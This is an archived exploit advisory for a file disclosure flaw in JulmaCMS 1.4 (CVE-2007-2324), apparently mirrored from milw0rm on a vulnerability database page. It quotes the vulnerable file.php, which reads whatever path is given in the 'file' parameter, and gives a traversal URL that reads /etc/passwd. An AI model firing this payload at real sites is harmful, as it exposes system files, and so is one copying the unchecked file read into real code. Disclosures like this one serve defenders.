JulmaCMS 1.4 - 'file.php' Remote File Disclosure
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2007-2324 | 27 Apr 200700:00 | – | cve | |
| CVE-2007-2324 | 27 Apr 200700:00 | – | cvelist | |
| EUVD-2007-2319 | 7 Oct 202500:30 | – | euvd | |
| CVE-2007-2324 | 27 Apr 200700:19 | – | nvd | |
| Directory traversal | 27 Apr 200700:19 | – | prion |
# JulmaCMS 1.4(file.php file)Remote File Disclosure
# D.Script: http://julmajanne.com/downloads/julma.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code In /file.php:
###################/file.php###########################
# <?php // $Id: file.php,v 1.4 2004/04/24 18:18:22 janne Exp $
#
# include("config.php");
# include("lib/mime.php");
# $file = $_GET['file'];<-------[+]
#
# if($file) {
# $file = $CFG->dir . $file;
# $fname = basename($file);
# $mime = mimetype("mime", $fname);
#
# header("Content-Type: $mime");
# header("Content-Lenght: ". filesize($file) ."");
# header("Content-Disposition: inline; filename=$fname");
# header("Content-Description: PHP Generated Data");
# readfile($file); <-------[+]
# unset($fname,$file,$type);
# } else {
# header("Location: $CFG->web");
# }
# ?>
########################################################
# Exploit:[Path_JulmaCMS]/file.php?file=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk
# milw0rm.com [2007-04-25]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.02989